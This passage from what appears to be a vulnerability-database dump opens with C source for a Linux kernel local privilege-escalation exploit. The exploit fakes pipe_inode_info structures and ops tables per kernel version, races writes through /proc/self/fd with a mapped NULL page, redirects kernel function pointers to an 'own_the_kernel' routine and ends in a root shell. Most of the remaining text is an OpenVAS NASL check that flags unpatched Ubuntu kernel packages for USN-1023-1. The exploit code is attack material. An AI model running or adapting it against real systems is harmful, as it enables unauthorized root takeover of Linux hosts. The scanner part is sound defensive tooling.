pipe_buffer2619orolder {\n void *page;\n unsigned int offset, len;\n void *ops;\n unsigned int flags;\n};\n\nstruct pipe_buffer2616orolder {\n void *page;\n unsigned int offset, len;\n void *ops;\n};\n\nstruct pipe_inode_info2620ornewer {\n unsigned int spinlock;\n /*\n // LOCKBREAK\n unsigned int break_lock;\n // DEBUG_SPINLOCK\n unsigned int magic, owner_cpu;\n void *owner;\n */\n void *next, *prev;\n unsigned int nrbufs, curbuf;\n void *tmp_page;\n unsigned int readers;\n unsigned int writers;\n unsigned int waiting_writers;\n unsigned int r_counter;\n unsigned int w_counter;\n void *fasync_readers;\n void *fasync_writers;\n void *inode;\n struct pipe_buffer2620ornewer bufs[PIPE_BUFFERS];\n};\n\nstruct pipe_inode_info2619orolder {\n unsigned int spinlock;\n /*\n // if PREEMPT enabled\n unsigned int break_lock;\n // DEBUG_SPINLOCK\n unsigned int magic, owner_cpu;\n void *owner;\n */\n void *next, *prev;\n unsigned int nrbufs, curbuf;\n struct pipe_buffer2619orolder bufs[PIPE_BUFFERS];\n void *tmp_page;\n unsigned int start;\n unsigned int readers;\n unsigned int 
writers;\n unsigned int waiting_writers;\n unsigned int r_counter;\n unsigned int w_counter;\n void *fasync_readers;\n void *fasync_writers;\n void *inode;\n};\n\nstruct pipe_inode_info2616orolder {\n unsigned int spinlock;\n /*\n // if PREEMPT enabled\n unsigned int break_lock;\n // DEBUG_SPINLOCK\n unsigned int magic, owner_cpu;\n */\n void *owner;\n void *next, *prev;\n unsigned int nrbufs, curbuf;\n struct pipe_buffer2616orolder bufs[PIPE_BUFFERS];\n void *tmp_page;\n unsigned int start;\n unsigned int readers;\n unsigned int writers;\n unsigned int waiting_writers;\n unsigned int r_counter;\n unsigned int w_counter;\n void *fasync_readers;\n void *fasync_writers;\n};\n\nstruct fasync_struct {\n int magic;\n int fa_fd;\n struct fasync_struct *fa_next;\n void *file;\n};\n\nstruct pipe_inode_info2610orolder {\n /* this includes 2.4 kernels */\n unsigned long lock; // can be rw or spin\n void *next, *prev;\n char *base;\n unsigned int len;\n unsigned int start;\n unsigned int readers;\n unsigned int writers;\n /* 2.4 only */\n unsigned int waiting_readers;\n\n unsigned int waiting_writers;\n unsigned int r_counter;\n unsigned int w_counter;\n /* 2.6 only */\n struct fasync_struct *fasync_readers;\n struct fasync_struct *fasync_writers;\n};\n\nint prepare(unsigned char *buf)\n{ \n struct pipe_inode_info2610orolder *info_oldest = (struct pipe_inode_info2610orolder *)buf;\n struct pipe_inode_info2616orolder *info_older = (struct pipe_inode_info2616orolder *)buf;\n struct pipe_inode_info2619orolder *info_old = (struct pipe_inode_info2619orolder *)buf;\n struct pipe_inode_info2620ornewer *info_new = (struct pipe_inode_info2620ornewer *)buf;\n struct pipe_buf_operations *ops = (struct pipe_buf_operations *)0x800;\n int i;\n int newver;\n struct utsname unm;\n\n i = uname(&unm);\n if (i != 0) {\n printf(\"unable to get kernel version\\n\");\n exit(1);\n }\n\n if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '2' && unm.release[5] >= '0' && 
unm.release[5] <= '9') {\n fprintf(stdout, \" [+] Using newer pipe_inode_info layout\\n\");\n newver = 3;\n } else if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '1' && unm.release[5] >= '7' && unm.release[5] <= '9') {\n fprintf(stdout, \" [+] Using older pipe_inode_info layout\\n\");\n newver = 2;\n } else if (strlen(unm.release) >= 5 && unm.release[2] == '6') {\n fprintf(stdout, \" [+] Using older-er pipe_inode_info layout\\n\");\n newver = 1;\n// } else if (strlen(unm.release) >= 5 && unm.release[2] >= '4') {\n// is_old_kernel = 1;\n// newver = 0;\n } else {\n fprintf(stdout, \" [+] This kernel is still vulnerable, but I can't be bothered to write the exploit. Write it yourself.\\n\");\n exit(1);\n }\n\n /* for most of these what will happen is our write will\n cause ops->confirm(/pin) to be called, which we've replaced\n with own_the_kernel\n for the 2.6.10->2.6.16 case it has no confirm/pin op, so what gets\n called instead (repeatedly) is the release op\n */\n if (newver == 3) {\n /* uncomment for DEBUG_SPINLOCK */\n //info_new->magic = 0xdead4ead;\n /* makes list_head empty for wake_up_common */\n info_new->next = &info_new->next;\n info_new->readers = 1;\n info_new->writers = 1;\n info_new->nrbufs = 1;\n info_new->curbuf = 1;\n for (i = 0; i < PIPE_BUFFERS; i++)\n info_new->bufs[i].ops = (void *)ops;\n } else if (newver == 2) {\n /* uncomment for DEBUG_SPINLOCK */\n //info_old->magic = 0xdead4ead;\n /* makes list_head empty for wake_up_common */\n info_old->next = &info_old->next;\n info_old->readers = 1;\n info_old->writers = 1;\n info_old->nrbufs = 1;\n info_old->curbuf = 1;\n for (i = 0; i < PIPE_BUFFERS; i++)\n info_old->bufs[i].ops = (void *)ops;\n } else if (newver == 1) {\n /* uncomment for DEBUG_SPINLOCK */\n //info_older->magic = 0xdead4ead;\n /* makes list_head empty for wake_up_common */\n info_older->next = &info_older->next;\n info_older->readers = 1;\n info_older->writers = 1;\n info_older->nrbufs = 1;\n 
info_older->curbuf = 1;\n /* we'll get called multiple times from free_pipe_info\n but it's ok because own_the_kernel handles this case\n */\n for (i = 0; i < PIPE_BUFFERS; i++)\n info_older->bufs[i].ops = (void *)ops;\n } else {\n /*\n different ballgame here, instead of being able to \n provide a function pointer in the ops table, you \n control a base address used to compute the address for \n a copy into the kernel via copy_from_user. The \n following should get you started.\n */\n /* lookup symbol for writable fptr then trigger it later\n change the main write in the one thread to write out \n pointers with the value of exp_state->exploit_kernel\n */\n info_oldest->base = (char *)0xc8000000;\n info_oldest->readers = 1;\n info_oldest->writers = 1;\n return 0;\n }\n\n ops->can_merge = 1;\n for (i = 0; i < 16; i++)\n ((void **)&ops->map)[i] = exp_state->own_the_kernel;\n\n return 0;\n}\n\nint requires_null_page = 1;\n\nint get_exploit_state_ptr(struct exploit_state *ptr)\n{\n exp_state = ptr;\n return 0;\n}\n\nint trigger(void)\n{\n char buf[128];\n int fd;\n int i = 0;\n\n /* ignore sigpipe so we don't bail out early */\n signal(SIGPIPE, SIG_IGN);\n\n start_thread(go_go_speed_racer, NULL);\n\n fprintf(stdout, \" [+] We'll let this go for a while if needed...\\n\");\n fflush(stdout);\n\n while (!exp_state->got_ring0 && i < 10000000) {\n fd = pipefd[1];\n sprintf(buf, \"/proc/self/fd/%d\", fd);\n fd = open(buf, O_WRONLY | O_NONBLOCK);\n if (fd >= 0) {\n /* bust spinlock */\n *(unsigned int *)NULL = is_old_kernel ? 0 : 1;\n write(fd, \".\", 1);\n close(fd);\n }\n i++;\n }\n\n if (!exp_state->got_ring0) {\n fprintf(stdout, \" [+] Failed to trigger the vulnerability. 
Is this a single processor machine with CONFIG_PREEMPT_NONE=y?\\n\");\n return 0;\n }\n\n return 1;\n}\n\nint post(void)\n{\n// return RUN_ROOTSHELL;\n return FUNNY_PIC_AND_ROOTSHELL;\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2018-01-18T11:04:33", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1023-1", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for Linux kernel vulnerabilities USN-1023-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3850", "CVE-2010-3848", "CVE-2010-3849"], "modified": "2018-01-17T00:00:00", "id": "OPENVAS:1361412562310840544", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840544", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1023_1.nasl 8447 2018-01-17 16:12:19Z teissa $\n#\n# Ubuntu Update for Linux kernel vulnerabilities USN-1023-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Nelson Elhage discovered several problems with the Acorn Econet protocol\n driver. A local user could cause a denial of service via a NULL pointer\n dereference, escalate privileges by overflowing the kernel stack, and\n assign Econet addresses to arbitrary interfaces.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1023-1\";\ntag_affected = \"Linux kernel vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 10.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1023-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840544\");\n script_version(\"$Revision: 8447 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:12:19 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1023-1\");\n script_cve_id(\"CVE-2010-3848\", \"CVE-2010-3849\", \"CVE-2010-3850\");\n script_name(\"Ubuntu Update for Linux kernel vulnerabilities USN-1023-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , 
value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307-ec2\", ver:\"2.6.31-307.22\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-307-ec2\", ver:\"2.6.31-307.22\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-386\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic-pae\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-386\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic-pae\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-virtual\", ver:\"2.6.31-22.69\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 
if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", 
rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23-generic-pae\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23-generic\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23-virtual\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-23-generic-pae\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-23-generic\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-23-virtual\", ver:\"2.6.35-23.41\", 
rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.35-1023.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-2.6.35-23\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.35\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-common\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"floppy-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-23-generic-pae-di\", 
ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
